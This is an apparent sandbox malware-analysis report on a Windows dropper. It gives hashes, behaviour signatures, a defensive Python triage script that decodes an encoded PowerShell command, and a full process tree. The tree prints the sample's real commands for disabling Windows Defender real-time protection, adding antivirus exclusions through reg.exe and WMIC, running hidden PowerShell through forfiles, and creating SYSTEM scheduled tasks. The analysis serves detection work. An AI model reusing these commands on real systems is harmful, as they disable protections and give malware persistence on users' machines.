Analysis

  • max time kernel
    218s
  • max time network
    249s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64
    arch:x86
    image:win7-20231129-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    01/07/2024, 05:06

General

  • Target

    ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe

  • Size

    7.3MB

  • MD5

    2e71f91c22ed33da2d442a0eb12fe951

  • SHA1

    0c2eec9c3ff33ef905204a8ae205f533571a1cef

  • SHA256

    ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b

  • SHA512

    8602a9698c944d5962e190feb04b7ebb471a828f828e9b97c4a9352a45224935d2b9860b2d7d75ab03eb881e5eb380a11bb54ca3f2fa61e068d55882c5929269

  • SSDEEP

    196608:91OFx9BggZVkFSL0ng/0O9pr89EDAtJ1i1Lzv0GB+grfTuD:3ODH30qD07sFzv3B+SC

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with its display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 30 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
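Every signature above that matters for triage (hidden PowerShell, Defender real-time protection and exclusion changes through reg.exe and WMI MSFT_MpPreference, forfiles proxy execution, SYSTEM scheduled tasks pointing at a Temp binary) is visible in plain command lines. The following Python script is an added example, not part of the tria.ge report or of the sample's code: it tags command lines with those behaviours and decodes the -EncodedCommand blob. The sample command lines are copied from the process tree of this report; the tag names and the regexes are the example's own.

```python
import base64
import re

# Constructed sample: command lines copied verbatim from the process tree of this report.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe\" OF /KgdidrG 525403 /S" /V1 /F',
    r'schtasks /CREATE /TN "giIFGvDdF" /SC once /ST 02:33:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /run /I /tn "giIFGvDdF"',
]

# Both the policy hive and the live Defender hive count as tampering targets.
DEFENDER_KEY = re.compile(r'\\(?:Policies\\)?Microsoft\\Windows Defender\\', re.I)
# powershell.exe accepts -e, -ec, -enc and longer prefixes of -EncodedCommand;
# -ExecutionPolicy must not match, hence the explicit alternation.
ENCODED_ARG = re.compile(r'\s-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a powershell -EncodedCommand argument, or None if absent.
    The argument is base64 over UTF-16LE, which is why the blob is full of 'A' characters."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the evasion/persistence tags (example's own names) that apply to one command line."""
    low = cmdline.lower()
    tags = []
    if re.search(r'\breg(?:\.exe)?"?\s+(?:add|delete)\b', low) and DEFENDER_KEY.search(cmdline):
        tags.append('defender_registry_tamper')
    if 'msft_mppreference' in low and ' call add ' in low:
        tags.append('defender_exclusion_wmi')          # exclusion added through the Defender WMI provider
    if 'forfiles' in low and ' /c ' in low:
        tags.append('forfiles_proxy_exec')             # LOLBin used to launch the next stage
    if 'schtasks' in low and '/create' in low:
        tags.append('schtask_create')
        if re.search(r'/ru\s+"?system"?', low) and '\\appdata\\local\\temp\\' in low:
            tags.append('schtask_system_from_temp')    # SYSTEM task whose binary lives in a user-writable dir
    if decode_encoded_command(cmdline) is not None:
        tags.append('encoded_powershell')
    return tags


def triage(cmdlines):
    """Map each command line to its tags plus any decoded PowerShell payload."""
    return [
        {'cmdline': c, 'tags': classify(c), 'decoded': decode_encoded_command(c)}
        for c in cmdlines
    ]


if __name__ == '__main__':
    for hit in triage(SAMPLE_CMDLINES):
        if hit['tags']:
            print(', '.join(hit['tags']), '<-', hit['cmdline'][:80])
            if hit['decoded']:
                print('    decoded:', hit['decoded'])
```

Run against the lines above, the forfiles entry gets both the proxy-execution and the WMI-exclusion tags because the whole child command is embedded in its /c argument, and the -EncodedCommand in the giIFGvDdF, gZgEDmWMy and gNgVmLWKk tasks decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`; the sample is forcing a Group Policy refresh, presumably so that the values it wrote under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender are applied without delay.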

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
    "C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Users\Admin\AppData\Local\Temp\7zS1A83.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Users\Admin\AppData\Local\Temp\7zS1EE6.tmp\Install.exe
        .\Install.exe /iLdidEHGZ "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2572
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe\" OF /KgdidrG 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2436
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1720
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9F66153D-A706-4186-9A8C-3E56C053AED2} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe
      C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe OF /KgdidrG 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "giIFGvDdF" /SC once /ST 02:33:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1932
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "giIFGvDdF"
        3⤵
        PID:2792
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "giIFGvDdF"
        3⤵
        PID:1904
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        3⤵
        PID:1496
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:408
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        3⤵
        PID:836
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2880
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gZgEDmWMy" /SC once /ST 04:28:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2424
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gZgEDmWMy"
        3⤵
        PID:1064
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gZgEDmWMy"
        3⤵
        PID:2116
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
        3⤵
        PID:2400
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          4⤵
          PID:2088
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1592
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2204
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:3024
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:3048
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:3028
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:3052
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
        3⤵
        PID:1324
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1988
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
        3⤵
        PID:1884
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1004
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C copy nul "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
        3⤵
        PID:2592
      • C:\Windows\SysWOW64\wscript.exe
        wscript "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
        3⤵
        • Modifies data under HKEY_USERS
        PID:2812
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2860
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2732
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2552
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2504
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2436
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2824
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2108
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1676
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2768
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1956
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2332
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1204
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2676
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:1640
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:1932
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2680
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          4⤵
          • Windows security bypass
          PID:2260
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          4⤵
          • Windows security bypass
          PID:2308
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2816
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:696
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1468
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1720
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2304
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:484
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2356
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2984
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:852
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1296
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2420
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1812
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2856
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:2080
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:1124
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:1248
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
          4⤵
          PID:2112
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
          4⤵
          PID:816
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gNgVmLWKk" /SC once /ST 03:07:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2200
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gNgVmLWKk"
        3⤵
        PID:2120
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "gNgVmLWKk"
        3⤵
        PID:376
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        3⤵
        PID:1004
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
          4⤵
          PID:2932
      • C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        3⤵
        PID:2592
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
          4⤵
          PID:2448
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "bdmBPZkQYKMDiCzlG" /SC once /ST 00:39:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe\" 5U /WuvkdidDy 525403 /S" /V1 /F
        3⤵
        • Drops file in Windows directory
